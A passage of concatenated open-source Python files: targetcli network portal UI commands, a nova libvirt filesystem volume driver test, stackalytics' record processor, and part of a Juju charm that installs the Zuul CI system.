return self.new_node(ui_portal)
def ui_complete_create(self, parameters, text, current_param):
'''
Parameter auto-completion method for user command create.
@param parameters: Parameters on the command line.
@type parameters: dict
@param text: Current text of parameter being typed by the user.
@type text: str
@param current_param: Name of parameter to complete.
@type current_param: str
@return: Possible completions
@rtype: list of str
'''
def list_eth_ips():
if not ethtool:
return []
devcfgs = ethtool.get_interfaces_info(ethtool.get_devices())
addrs = set()
for d in devcfgs:
if d.ipv4_address:
addrs.add(d.ipv4_address)
addrs.add("0.0.0.0")
for ip6 in d.get_ipv6_addresses():
addrs.add(ip6.address)
addrs.add("::0") # only list ::0 if ipv6 present
return sorted(addrs)
if current_param == 'ip_address':
completions = [addr for addr in list_eth_ips()
if addr.startswith(text)]
else:
completions = []
if len(completions) == 1:
return [completions[0] + ' ']
else:
return completions
def ui_command_delete(self, ip_address, ip_port):
'''
Deletes the Network Portal with specified I{ip_address} and I{ip_port}.
SEE ALSO
========
B{create}
'''
self.assert_root()
portal = NetworkPortal(self.tpg, self._canonicalize_ip(ip_address),
ip_port, mode='lookup')
portal.delete()
self.shell.log.info("Deleted network portal %s:%s"
% (ip_address, ip_port))
self.refresh()
def ui_complete_delete(self, parameters, text, current_param):
'''
Parameter auto-completion method for user command delete.
@param parameters: Parameters on the command line.
@type parameters: dict
@param text: Current text of parameter being typed by the user.
@type text: str
@param current_param: Name of parameter to complete.
@type current_param: str
@return: Possible completions
@rtype: list of str
'''
completions = []
        # TODO: check whether a dict comprehension is acceptable here with
        # the supported python versions.
portals = {}
all_ports = set([])
for portal in self.tpg.network_portals:
all_ports.add(str(portal.port))
portal_ip = portal.ip_address.strip('[]')
            if portal_ip not in portals:
portals[portal_ip] = []
portals[portal_ip].append(str(portal.port))
if current_param == 'ip_address':
completions = [addr for addr in portals if addr.startswith(text)]
if 'ip_port' in parameters:
port = parameters['ip_port']
completions = [addr for addr in completions
if port in portals[addr]]
elif current_param == 'ip_port':
if 'ip_address' in parameters:
addr = parameters['ip_address']
if addr in portals:
completions = [port for port in portals[addr]
if port.startswith(text)]
else:
completions = [port for port in all_ports
if port.startswith(text)]
if len(completions) == 1:
return [completions[0] + ' ']
else:
return completions
class UIPortal(UIRTSLibNode):
'''
A generic UI for a network portal.
'''
def __init__(self, portal, parent):
name = "%s:%s" % (portal.ip_address, portal.port)
super(UIPortal, self).__init__(name, portal, parent)
self.refresh()
def summary(self):
        if self.rtsnode.iser:
            return ('iser', True)
        elif self.rtsnode.offload:
            return ('offload', True)
        return ('', True)
def ui_command_enable_iser(self, boolean):
'''
Enables or disables iSER for this NetworkPortal.
If iSER is not supported by the kernel, this command will do nothing.
'''
boolean = self.ui_eval_param(boolean, 'bool', False)
self.rtsnode.iser = boolean
self.shell.log.info("iSER enable now: %s" % self.rtsnode.iser)
def ui_command_enable_offload(self, boolean):
'''
Enables or disables offload for this NetworkPortal.
If offload is not supported by the kernel, this command will do nothing.
'''
boolean = self.ui_eval_param(boolean, 'bool', False)
self.rtsnode.offload = boolean
self.shell.log.info("offload enable now: %s" % self.rtsnode.offload)
| agrover/targetcli-fb | targetcli/ui_target.py | Python | apache-2.0 | 54,009 |
# Copyright 2015 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import mock
from nova import test
from nova.tests.unit.virt.libvirt import fakelibvirt
from nova import utils
from nova.virt import fake
from nova.virt.libvirt import driver
from nova.virt.libvirt.volume import fs
FAKE_MOUNT_POINT = '/var/lib/nova/fake-mount'
FAKE_SHARE = 'fake-share'
NORMALIZED_SHARE = FAKE_SHARE + '-normalized'
HASHED_SHARE = utils.get_hash_str(NORMALIZED_SHARE)
FAKE_DEVICE_NAME = 'fake-device'
class FSVolumeDriverSubclassSignatureTestCase(test.SubclassSignatureTestCase):
def _get_base_class(self):
# We do this because it has the side-effect of loading all the
# volume drivers
self.useFixture(fakelibvirt.FakeLibvirtFixture())
driver.LibvirtDriver(fake.FakeVirtAPI(), False)
return fs.LibvirtBaseFileSystemVolumeDriver
class FakeFileSystemVolumeDriver(fs.LibvirtBaseFileSystemVolumeDriver):
def _get_mount_point_base(self):
return FAKE_MOUNT_POINT
def _normalize_export(self, export):
return NORMALIZED_SHARE
class LibvirtBaseFileSystemVolumeDriverTestCase(test.NoDBTestCase):
"""Tests the basic behavior of the LibvirtBaseFileSystemVolumeDriver"""
def setUp(self):
super(LibvirtBaseFileSystemVolumeDriverTestCase, self).setUp()
self.connection = mock.Mock()
self.driver = FakeFileSystemVolumeDriver(self.connection)
self.connection_info = {
'data': {
'export': FAKE_SHARE,
'name': FAKE_DEVICE_NAME,
}
}
def test_get_device_path(self):
path = self.driver._get_device_path(self.connection_info)
expected_path = os.path.join(FAKE_MOUNT_POINT,
HASHED_SHARE,
FAKE_DEVICE_NAME)
self.assertEqual(expected_path, path)
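        # For reference, a sketch of the path being asserted above (the hash
        # value is whatever utils.get_hash_str returns for the normalized
        # share):
        #
        #     /var/lib/nova/fake-mount/<hash('fake-share-normalized')>/fake-device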
| rajalokan/nova | nova/tests/unit/virt/libvirt/volume/test_fs.py | Python | apache-2.0 | 2,437 |
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import bisect
import collections
import copy
import functools
import time
from oslo_config import cfg
from oslo_log import log as logging
import six
from stackalytics.processor import launchpad_utils
from stackalytics.processor import user_processor
from stackalytics.processor import utils
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
class RecordProcessor(object):
def __init__(self, runtime_storage_inst):
self.runtime_storage_inst = runtime_storage_inst
self.domains_index = runtime_storage_inst.get_by_key('companies')
self.releases = runtime_storage_inst.get_by_key('releases')
self.releases_dates = [r['end_date'] for r in self.releases]
self.modules = None
self.alias_module_map = None
def _get_release(self, timestamp):
release_index = bisect.bisect(self.releases_dates, timestamp)
if release_index >= len(self.releases):
LOG.warning('Timestamp %s is beyond releases boundaries, the last '
'release will be used. Please consider adding a '
'new release into default_data.json', timestamp)
release_index = len(self.releases) - 1
return self.releases[release_index]['release_name']
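    # Illustrative example (assumed data): with release end dates
    # [100, 200, 300], a record dated 150 yields
    # bisect.bisect([100, 200, 300], 150) == 1, i.e. the second release.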
def _get_modules(self):
if self.modules is None:
self.modules = set()
self.alias_module_map = dict()
for repo in utils.load_repos(self.runtime_storage_inst):
module = repo['module'].lower()
module_aliases = repo.get('aliases') or []
add = True
for module_name in ([module] + module_aliases):
for m in self.modules:
if module_name.find(m) >= 0:
add = False
break
if m.find(module_name) >= 0:
self.modules.remove(m)
break
if add:
self.modules.add(module_name)
for alias in module_aliases:
self.alias_module_map[alias] = module
return self.modules, self.alias_module_map
def _need_to_fetch_launchpad(self):
return CONF.fetching_user_source == 'launchpad'
def _update_user(self, record):
email = record.get('author_email')
user_e = user_processor.load_user(
self.runtime_storage_inst, email=email) or {}
user_name = record.get('author_name')
launchpad_id = record.get('launchpad_id')
if (self._need_to_fetch_launchpad() and email and (not user_e) and
(not launchpad_id) and (not user_e.get('launchpad_id'))):
# query LP
launchpad_id, lp_user_name = launchpad_utils.query_lp_info(email)
if lp_user_name:
user_name = lp_user_name
gerrit_id = record.get('gerrit_id')
if gerrit_id:
user_g = user_processor.load_user(
self.runtime_storage_inst, gerrit_id=gerrit_id) or {}
if (self._need_to_fetch_launchpad() and (not user_g) and
(not launchpad_id) and (not user_e.get('launchpad_id'))):
# query LP
guessed_lp_id = gerrit_id
lp_user_name = launchpad_utils.query_lp_user_name(
guessed_lp_id)
if lp_user_name == user_name:
launchpad_id = guessed_lp_id
else:
user_g = {}
zanata_id = record.get('zanata_id')
if zanata_id:
user_z = user_processor.load_user(
self.runtime_storage_inst, zanata_id=zanata_id) or {}
if (self._need_to_fetch_launchpad() and (not user_z) and
(not launchpad_id) and (not user_e.get('launchpad_id'))):
# query LP
guessed_lp_id = zanata_id
user_name = launchpad_utils.query_lp_user_name(guessed_lp_id)
if user_name != guessed_lp_id:
launchpad_id = guessed_lp_id
else:
user_z = {}
user_l = user_processor.load_user(
self.runtime_storage_inst, launchpad_id=launchpad_id) or {}
if user_processor.are_users_same([user_e, user_l, user_g, user_z]):
# If sequence numbers are set and the same, merge is not needed
return user_e
user = user_processor.create_user(
self.domains_index, launchpad_id, email, gerrit_id, zanata_id,
user_name)
if user_e or user_l or user_g or user_z:
# merge between existing profiles and a new one
user, users_to_delete = user_processor.merge_user_profiles(
self.domains_index, [user_e, user_l, user_g, user_z, user])
# delete all unneeded profiles
user_processor.delete_users(
self.runtime_storage_inst, users_to_delete)
else:
# create new profile
if (self._need_to_fetch_launchpad() and not user_name):
user_name = launchpad_utils.query_lp_user_name(launchpad_id)
if user_name:
user['user_name'] = user_name
LOG.debug('Created new user: %s', user)
user_processor.store_user(self.runtime_storage_inst, user)
LOG.debug('Stored user: %s', user)
return user
def _update_record_and_user(self, record):
user = self._update_user(record)
record['user_id'] = user['user_id']
if user.get('user_name'):
record['author_name'] = user['user_name']
company, policy = user_processor.get_company_for_date(
user['companies'], record['date'])
if not user.get('static'):
# for auto-generated profiles affiliation may be overridden
if company != '*robots' and policy == 'open':
company = (user_processor.get_company_by_email(
self.domains_index, record.get('author_email')) or company)
record['company_name'] = company
def _process_commit(self, record):
record['primary_key'] = record['commit_id']
record['loc'] = record['lines_added'] + record['lines_deleted']
record['author_email'] = record['author_email'].lower()
record['commit_date'] = record['date']
coauthors = record.get('coauthor')
if not coauthors:
self._update_record_and_user(record)
if record['company_name'] != '*robots':
yield record
else:
if record['author_email'] not in [
c['author_email'] for c in coauthors]:
coauthors.append({'author_name': record['author_name'],
'author_email': record['author_email']})
for coauthor in coauthors:
coauthor['date'] = record['date']
self._update_record_and_user(coauthor)
for coauthor in coauthors:
new_record = copy.deepcopy(record)
new_record.update(coauthor)
new_record['primary_key'] += coauthor['author_email']
yield new_record
def _make_review_record(self, record):
# copy everything except patchsets and flatten user data
review = dict([(k, v) for k, v in six.iteritems(record)
if k not in ['patchSets', 'owner', 'createdOn',
'comments']])
owner = record['owner']
review['primary_key'] = review['id']
if owner.get('username'):
review['gerrit_id'] = owner['username']
review['author_name'] = (owner.get('name') or owner.get('username')
or 'Anonymous Coward') # do it like gerrit
if owner.get('email'):
review['author_email'] = owner['email'].lower()
review['date'] = record['createdOn']
patch_sets = record.get('patchSets', [])
review['updated_on'] = review['date']
if patch_sets:
patch = patch_sets[-1]
if 'approvals' in patch:
review['value'] = min([int(p['value'])
for p in patch['approvals']])
review['updated_on'] = patch['approvals'][0]['grantedOn']
else:
review['updated_on'] = patch['createdOn']
if 'value' not in review:
review['value'] = 0
self._update_record_and_user(review)
return review
def _make_patch_record(self, review, patch):
patch_record = dict()
patch_record['record_type'] = 'patch'
patch_record['primary_key'] = utils.get_patch_id(
review['id'], patch['number'])
patch_record['number'] = patch['number']
patch_record['date'] = patch['createdOn']
uploader = patch['uploader']
if uploader.get('username'):
patch_record['gerrit_id'] = uploader['username']
patch_record['author_name'] = (uploader.get('name')
or uploader.get('username')
or 'Anonymous Coward')
if uploader.get('email'):
patch_record['author_email'] = uploader['email'].lower()
patch_record['module'] = review['module']
patch_record['branch'] = review['branch']
patch_record['review_id'] = review['id']
self._update_record_and_user(patch_record)
return patch_record
def _make_mark_record(self, review, patch, approval):
# copy everything and flatten user data
mark = dict([(k, v) for k, v in six.iteritems(approval)
if k not in ['by', 'grantedOn', 'value', 'description']])
reviewer = approval['by']
mark['record_type'] = 'mark'
mark['value'] = int(approval['value'])
mark['date'] = approval['grantedOn']
mark['primary_key'] = (review['id'] + str(mark['date']) + mark['type'])
mark['gerrit_id'] = reviewer['username']
mark['author_name'] = reviewer.get('name') or reviewer.get('username')
mark['author_email'] = reviewer['email'].lower()
mark['module'] = review['module']
mark['branch'] = review['branch']
mark['review_id'] = review['id']
mark['patch'] = int(patch['number'])
if reviewer['username'] == patch['uploader'].get('username'):
# reviewer is the same as author of the patch
mark['type'] = 'Self-%s' % mark['type']
self._update_record_and_user(mark)
return mark
def _process_review(self, record):
"""Process a review.
Review spawns into records of three types:
* review - records that a user created review request
* patch - records that a user submitted another patch set
* mark - records that a user set approval mark to given review
"""
owner = record['owner']
if 'email' in owner or 'username' in owner:
yield self._make_review_record(record)
for patch in record.get('patchSets', []):
if (('email' in patch['uploader']) or
('username' in patch['uploader'])):
yield self._make_patch_record(record, patch)
if 'approvals' not in patch:
continue # not reviewed by anyone
for approval in patch['approvals']:
if approval['type'] not in ('Code-Review', 'Workflow'):
continue # keep only Code-Review and Workflow
if ('email' not in approval['by'] or
'username' not in approval['by']):
continue # ignore
yield self._make_mark_record(record, patch, approval)
# check for abandon action
if record.get('status') == 'ABANDONED':
for comment in reversed(record.get('comments') or []):
if comment['message'] == 'Abandoned':
action = dict(type='Abandon', value=0)
action['by'] = comment['reviewer']
action['grantedOn'] = comment['timestamp']
if ('email' not in action['by'] or
'username' not in action['by']):
continue # ignore
yield self._make_mark_record(
record, record['patchSets'][-1], action)
def _guess_module(self, record):
subject = record['subject'].lower()
pos = len(subject)
best_guess_module = None
modules, alias_module_map = self._get_modules()
for module in modules:
find = subject.find(module)
if (find >= 0) and (find < pos):
pos = find
best_guess_module = module
if best_guess_module:
if (((pos > 0) and (subject[pos - 1] == '[')) or
(not record.get('module'))):
record['module'] = best_guess_module
if not record.get('module'):
record['module'] = 'unknown'
elif record['module'] in alias_module_map:
record['module'] = alias_module_map[record['module']]
def _process_email(self, record):
record['primary_key'] = record['message_id']
record['author_email'] = record['author_email'].lower()
self._update_record_and_user(record)
self._guess_module(record)
if not record.get('blueprint_id'):
del record['body']
elif len(record['body']) > 4000:
record['body'] = record['body'][:4000] + '...'
yield record
def _process_blueprint(self, record):
bpd_author = record.get('drafter') or record.get('owner')
bpd = dict([(k, v) for k, v in six.iteritems(record)
if k.find('_link') < 0])
bpd['record_type'] = 'bpd'
bpd['primary_key'] = 'bpd:' + record['id']
bpd['launchpad_id'] = bpd_author
bpd['date'] = record['date_created']
bpd['web_link'] = record.get('web_link')
self._update_record_and_user(bpd)
yield bpd
if (record.get('assignee') and record['date_completed'] and
record.get('implementation_status') == 'Implemented'):
bpc = dict([(k, v) for k, v in six.iteritems(record)
if k.find('_link') < 0])
bpc['record_type'] = 'bpc'
bpc['primary_key'] = 'bpc:' + record['id']
bpc['launchpad_id'] = record['assignee']
bpc['date'] = record['date_completed']
self._update_record_and_user(bpc)
yield bpc
def _process_bug(self, record):
bug_created = record.copy()
bug_created['primary_key'] = 'bugf:' + record['id']
bug_created['record_type'] = 'bugf'
bug_created['launchpad_id'] = record.get('owner')
bug_created['date'] = record['date_created']
self._update_record_and_user(bug_created)
yield bug_created
FIXED_BUGS = ['Fix Committed', 'Fix Released']
if (('date_fix_committed' in record or 'date_fix_released' in record)
and record['status'] in FIXED_BUGS):
bug_fixed = record.copy()
bug_fixed['primary_key'] = 'bugr:' + record['id']
bug_fixed['record_type'] = 'bugr'
bug_fixed['launchpad_id'] = record.get('assignee') or '*unassigned'
# It appears that launchpad automatically sets the
# date_fix_committed field when a bug moves from an open
# state to Fix Released, however it isn't clear that this
# is documented. So, we take the commit date if it is
# present or the release date if no commit date is
# present.
bug_fixed['date'] = (
record.get('date_fix_committed') or
record['date_fix_released']
)
self._update_record_and_user(bug_fixed)
yield bug_fixed
def _process_member(self, record):
user_id = user_processor.make_user_id(member_id=record['member_id'])
record['primary_key'] = user_id
record['date'] = utils.member_date_to_timestamp(record['date_joined'])
record['author_name'] = record['member_name']
record['module'] = 'unknown'
company_draft = record['company_draft']
company_name = self.domains_index.get(utils.normalize_company_name(
company_draft)) or (utils.normalize_company_draft(company_draft))
        # author_email is used as the key when creating a new user
record['author_email'] = user_id
record['company_name'] = company_name
        # _update_record_and_user will create a new user if needed
self._update_record_and_user(record)
record['company_name'] = company_name
user = user_processor.load_user(self.runtime_storage_inst,
user_id=user_id)
user['user_name'] = record['author_name']
user['companies'] = [{
'company_name': company_name,
'end_date': 0,
}]
user['company_name'] = company_name
user_processor.store_user(self.runtime_storage_inst, user)
record['company_name'] = company_name
yield record
def _process_translation(self, record):
        # TODO: split translation and approval
translation = record.copy()
user_id = user_processor.make_user_id(zanata_id=record['zanata_id'])
translation['record_type'] = 'tr'
translation['primary_key'] = '%s:%s:%s:%s' % (
user_id, record['module'], record['date'], record['branch'])
translation['author_name'] = user_id
        # the following fields map onto the standard fields kept in the dashboard memory storage
translation['loc'] = record['translated']
translation['value'] = record['language']
self._update_record_and_user(translation)
yield translation
def _renew_record_date(self, record):
record['week'] = utils.timestamp_to_week(record['date'])
if ('release' not in record) or (not record['release']):
record['release'] = self._get_release(record['date'])
def process(self, record_iterator):
PROCESSORS = {
'commit': self._process_commit,
'review': self._process_review,
'email': self._process_email,
'bp': self._process_blueprint,
'bug': self._process_bug,
'member': self._process_member,
'i18n': self._process_translation,
}
for record in record_iterator:
for r in PROCESSORS[record['record_type']](record):
self._renew_record_date(r)
yield r
def _update_records_with_releases(self, release_index):
LOG.info('Update records with releases')
def record_handler(record):
if (record['record_type'] == 'commit'
and record['primary_key'] in release_index):
release = release_index[record['primary_key']]
else:
release = self._get_release(record['date'])
if record['release'] != release:
record['release'] = release
yield record
yield record_handler
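    # Note: each _update_* post-processor yields one or more record-handler
    # generators; utils.make_pipeline_processor (see post_processing below) is
    # assumed to apply every handler to every record and persist whatever the
    # handlers yield back.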
def _update_records_with_user_info(self):
LOG.info('Update user info in records')
def record_handler(record):
company_name = record['company_name']
user_id = record['user_id']
author_name = record['author_name']
self._update_record_and_user(record)
if ((record['company_name'] != company_name) or
(record['user_id'] != user_id) or
(record['author_name'] != author_name)):
LOG.debug('User info (%(id)s, %(name)s, %(company)s) has '
'changed in record %(record)s',
{'id': user_id, 'name': author_name,
'company': company_name, 'record': record})
yield record
yield record_handler
def _update_commits_with_merge_date(self):
LOG.info('Update commits with merge date')
change_id_to_date = {}
def record_handler_pass_1(record):
if (record['record_type'] == 'review' and
record.get('status') == 'MERGED'):
change_id_to_date[record['id']] = record['lastUpdated']
yield record_handler_pass_1
LOG.info('Update commits with merge date: pass 2')
def record_handler_pass_2(record):
if record['record_type'] == 'commit':
change_id_list = record.get('change_id')
if change_id_list and len(change_id_list) == 1:
change_id = change_id_list[0]
if change_id in change_id_to_date:
old_date = record['date']
if old_date != change_id_to_date[change_id]:
record['date'] = change_id_to_date[change_id]
self._renew_record_date(record)
LOG.debug('Date %(date)s has changed in record '
'%(record)s', {'date': old_date,
'record': record})
yield record
yield record_handler_pass_2
def _update_blueprints_with_mention_info(self):
LOG.info('Process blueprints and calculate mention info')
valid_blueprints = {}
mentioned_blueprints = {}
def record_handler_pass_1(record):
for bp in record.get('blueprint_id', []):
if bp in mentioned_blueprints:
mentioned_blueprints[bp]['count'] += 1
if record['date'] > mentioned_blueprints[bp]['date']:
mentioned_blueprints[bp]['date'] = record['date']
else:
mentioned_blueprints[bp] = {
'count': 1,
'date': record['date']
}
if record['record_type'] in ['bpd', 'bpc']:
valid_blueprints[record['id']] = {
'primary_key': record['primary_key'],
'count': 0,
'date': record['date']
}
yield record_handler_pass_1
for bp_name, bp in six.iteritems(valid_blueprints):
if bp_name in mentioned_blueprints:
bp['count'] = mentioned_blueprints[bp_name]['count']
bp['date'] = mentioned_blueprints[bp_name]['date']
else:
bp['count'] = 0
bp['date'] = 0
LOG.info('Process blueprints and calculate mention info: pass 2')
def record_handler_pass_2(record):
need_update = False
valid_bp = set([])
for bp in record.get('blueprint_id', []):
if bp in valid_blueprints:
valid_bp.add(bp)
else:
LOG.debug('Update record %s: removed invalid bp: %s',
record['primary_key'], bp)
need_update = True
record['blueprint_id'] = list(valid_bp)
if record['record_type'] in ['bpd', 'bpc']:
bp = valid_blueprints[record['id']]
if ((record.get('mention_count') != bp['count']) or
(record.get('mention_date') != bp['date'])):
record['mention_count'] = bp['count']
record['mention_date'] = bp['date']
LOG.debug('Update record %s: mention stats: (%s:%s)',
record['primary_key'], bp['count'], bp['date'])
need_update = True
if need_update:
yield record
yield record_handler_pass_2
def _determine_core_contributors(self):
LOG.info('Determine core contributors')
module_branches = collections.defaultdict(set)
quarter_ago = int(time.time()) - 60 * 60 * 24 * 30 * 3 # a quarter ago
def record_handler(record):
if (record['record_type'] == 'mark' and
record['date'] > quarter_ago and
record['value'] in [2, -2]):
module_branch = (record['module'], record['branch'])
user_id = record['user_id']
module_branches[user_id].add(module_branch)
yield record_handler
for user in self.runtime_storage_inst.get_all_users():
core_old = user.get('core')
user_module_branch = module_branches.get(user['user_id'])
if user_module_branch:
user['core'] = list(user_module_branch)
elif user.get('core'):
del user['core']
if user.get('core') != core_old:
user_processor.store_user(self.runtime_storage_inst, user)
def _close_patch(self, cores, marks):
if len(marks) < 2:
return
core_mark = 0
for mark in sorted(marks, key=lambda x: x['date'], reverse=True):
if core_mark == 0:
if (mark['module'], mark['branch'], mark['user_id']) in cores:
# mark is from core engineer
core_mark = mark['value']
continue
disagreement = ((core_mark != 0) and
((core_mark < 0 < mark['value']) or
(core_mark > 0 > mark['value'])))
old_disagreement = mark.get('disagreement', False)
mark['disagreement'] = disagreement
if old_disagreement != disagreement:
yield mark
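    # Example (illustrative): marks are scanned newest-first; if the newest
    # core-reviewer mark is -2 and an older mark on the same patch is +1,
    # the signs conflict and that older mark is flagged disagreement=True.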
def _update_marks_with_disagreement(self):
LOG.info('Process marks to find disagreements')
cores = set()
for user in self.runtime_storage_inst.get_all_users():
for (module, branch) in (user.get('core') or []):
cores.add((module, branch, user['user_id']))
# map from review_id to current patch and list of marks
marks_per_patch = collections.defaultdict(
lambda: {'patch_number': 0, 'marks': []})
def record_handler(record):
if (record['record_type'] == 'mark' and
record['type'] == 'Code-Review'):
review_id = record['review_id']
patch_number = record['patch']
if review_id in marks_per_patch:
# review is already seen, check if patch is newer
if (marks_per_patch[review_id]['patch_number'] <
patch_number):
# the patch is new, close the current
for processed in self._close_patch(
cores, marks_per_patch[review_id]['marks']):
yield processed
del marks_per_patch[review_id]
marks_per_patch[review_id]['patch_number'] = patch_number
marks_per_patch[review_id]['marks'].append(record)
yield record_handler
# purge the rest
for marks_patch in marks_per_patch.values():
self.runtime_storage_inst.set_records(
self._close_patch(cores, marks_patch['marks']))
def _update_members_company_name(self):
LOG.info('Update members with company names')
def record_handler(record):
if record['record_type'] != 'member':
return
company_draft = record['company_draft']
company_name = self.domains_index.get(
utils.normalize_company_name(company_draft)) or (
utils.normalize_company_draft(company_draft))
if company_name == record['company_name']:
return
LOG.debug('Update record %s, company name changed to %s',
record, company_name)
record['company_name'] = company_name
yield record
user = user_processor.load_user(self.runtime_storage_inst,
user_id=record['user_id'])
LOG.debug('Update user %s, company name changed to %s',
user, company_name)
user['companies'] = [{
'company_name': company_name,
'end_date': 0,
}]
user_processor.store_user(self.runtime_storage_inst, user)
yield record_handler
def _update_commits_with_module_alias(self):
LOG.info('Update record with aliases')
modules, alias_module_map = self._get_modules()
def record_handler(record):
if record['record_type'] != 'commit':
return
rec_module = record.get('module', None)
if rec_module and rec_module in alias_module_map:
record['module'] = alias_module_map[rec_module]
yield record
yield record_handler
def post_processing(self, release_index):
processors = [
self._update_records_with_user_info,
self._update_commits_with_merge_date,
functools.partial(self._update_records_with_releases,
release_index),
self._update_commits_with_module_alias,
self._update_blueprints_with_mention_info,
self._determine_core_contributors,
self._update_members_company_name,
self._update_marks_with_disagreement,
]
pipeline_processor = utils.make_pipeline_processor(processors)
self.runtime_storage_inst.set_records(pipeline_processor(
self.runtime_storage_inst.get_all_records))
| 0xf2/stackalytics | stackalytics/processor/record_processor.py | Python | apache-2.0 | 30,623 |
import ConfigParser
import os
import pwd
import shutil
import sys
import subprocess
import tempfile
sys.path.insert(0, os.path.join(os.environ['CHARM_DIR'], 'lib'))
from charmhelpers.core.hookenv import (charm_dir, config, log, relation_set,
                                       open_port, close_port, unit_get)
from charmhelpers.core.templating import render
from charmhelpers.fetch import giturl, apt_install, apt_update, archiveurl
from charmhelpers.core.host import service_restart, service_start, service_stop
PACKAGES = [ 'git', 'python-setuptools', 'python-dev', 'python-pip', 'apache2' ]
ZUUL_GIT_URL = 'https://github.com/openstack-infra/zuul.git'
ZUUL_USER = 'zuul'
ZUUL_CONF_DIR = '/etc/zuul'
ZUUL_SSH_DIR = '/home/zuul/.ssh'
ZUUL_SSH_PRIVATE_FILE = 'id_rsa'
ZUUL_RUN_DIR = '/var/run/zuul'
ZUUL_MERGER_RUN_DIR = '/var/run/zuul-merger'
ZUUL_STATE_DIR = '/var/lib/zuul'
ZUUL_GIT_DIR = '/var/lib/zuul/git'
ZUUL_LOG_DIR = '/var/log/zuul'
APACHE2_CONF_DIR = '/etc/apache2'
GEAR_GIT_URL = 'https://github.com/openstack-infra/gear.git'
GEAR_STABLE_TAG = '0.7.0'
OPENSTACK_FUNCTIONS_URL = 'https://raw.githubusercontent.com/' \
'openstack-infra/project-config/master/zuul/openstack_functions.py'
def render_logging_conf():
logging_conf = os.path.join(ZUUL_CONF_DIR, 'logging.conf')
context = { 'zuul_log': os.path.join(ZUUL_LOG_DIR, 'zuul.log') }
render('logging.conf', logging_conf, context, ZUUL_USER, ZUUL_USER)
def render_gearman_logging_conf():
gearman_logging_conf = os.path.join(ZUUL_CONF_DIR, 'gearman-logging.conf')
context = {
'gearman_log': os.path.join(ZUUL_LOG_DIR, 'gearman-server.log')
}
render('gearman-logging.conf', gearman_logging_conf, context, ZUUL_USER,
ZUUL_USER)
def render_zuul_conf():
gearman_start = "false"
if is_service_enabled("gearman"):
gearman_start = "true"
context = {
'gearman_host': config('gearman-server'),
'gearman_port': config('gearman-port'),
'gearman_internal': gearman_start,
'gearman_log': os.path.join(ZUUL_CONF_DIR, 'gearman-logging.conf'),
'gerrit_server': config('gerrit-server'),
'gerrit_port': '29418',
'gerrit_username': config('username'),
'gerrit_sshkey': os.path.join(ZUUL_SSH_DIR, ZUUL_SSH_PRIVATE_FILE),
'zuul_layout': os.path.join(ZUUL_CONF_DIR, 'layout.yaml'),
'zuul_logging': os.path.join(ZUUL_CONF_DIR, 'logging.conf'),
'zuul_pidfile': os.path.join(ZUUL_RUN_DIR, 'zuul.pid'),
'zuul_state_dir': ZUUL_STATE_DIR,
'zuul_status_url': config('status-url'),
'zuul_git_dir': ZUUL_GIT_DIR,
'zuul_url': config('zuul-url'),
'zuul_smtp_server': config('zuul-smtp-server'),
'zuul_smtp_from': config('zuul-smtp-from'),
'zuul_smtp_to': config('zuul-smtp-to'),
'merger_git_user_email': config('git-user-email'),
'merger_git_user_name': config('git-user-name'),
'merger_pidfile': os.path.join(ZUUL_MERGER_RUN_DIR, 'merger.pid')
}
zuul_conf = os.path.join(ZUUL_CONF_DIR, 'zuul.conf')
render('zuul.conf', zuul_conf, context, ZUUL_USER, ZUUL_USER)
def render_layout():
if is_service_enabled("server"):
layout_template = 'layout_standard.yaml'
elif is_service_enabled("gearman"):
layout_template = 'layout_gearman.yaml'
else:
layout_template = ''
if layout_template:
layout_conf = os.path.join(ZUUL_CONF_DIR, 'layout.yaml')
render(layout_template, layout_conf, { }, ZUUL_USER, ZUUL_USER)
def render_zuul_vhost_conf():
context = {
'git_dir': ZUUL_GIT_DIR
}
zuul_vhost = os.path.join(APACHE2_CONF_DIR, 'sites-available/zuul.conf')
render('apache2-vhost.conf', zuul_vhost, context, perms=0o644)
def download_openstack_functions():
url_handler = archiveurl.ArchiveUrlFetchHandler()
openstack_functions_path = os.path.join(ZUUL_CONF_DIR,
'openstack_functions.py')
url_handler.download(OPENSTACK_FUNCTIONS_URL, openstack_functions_path)
zuul_user = pwd.getpwnam(ZUUL_USER)
os.chown(openstack_functions_path, zuul_user.pw_uid, zuul_user.pw_gid)
    os.chmod(openstack_functions_path, 0o644)
def create_zuul_upstart_services():
zuul_server = '/etc/init/zuul-server.conf'
zuul_merger = '/etc/init/zuul-merger.conf'
zuul_server_bin = '/usr/local/bin/zuul-server'
zuul_merger_bin = '/usr/local/bin/zuul-merger'
zuul_conf = os.path.join(ZUUL_CONF_DIR, 'zuul.conf')
context = {
'zuul_server_bin': zuul_server_bin,
'zuul_conf': zuul_conf,
'zuul_user': ZUUL_USER
}
if is_service_enabled("server") or is_service_enabled("gearman"):
render('upstart/zuul-server.conf', zuul_server, context, perms=0o644)
context.pop('zuul_server_bin')
if is_service_enabled("merger"):
context.update({'zuul_merger_bin': zuul_merger_bin})
render('upstart/zuul-merger.conf', zuul_merger, context, perms=0o644)
def install_from_git(repository_url, tag):
current_dir = os.getcwd()
temp_dir = tempfile.mkdtemp()
git_handler = giturl.GitUrlFetchHandler()
git_handler.clone(repository_url, temp_dir, 'master')
os.chdir(temp_dir)
subprocess.check_call(['git', 'checkout', 'tags/{0}'.format(tag)])
subprocess.check_call(['pip', 'install', '-r', './requirements.txt'])
subprocess.check_call(['python', './setup.py', 'install'])
os.chdir(current_dir)
shutil.rmtree(temp_dir)
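# Example call, as used by install() below (clones master, then checks out
# the given tag and pip-installs the project):
#   install_from_git(GEAR_GIT_URL, GEAR_STABLE_TAG)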
def generate_zuul_ssh_key():
zuul_user = pwd.getpwnam(ZUUL_USER)
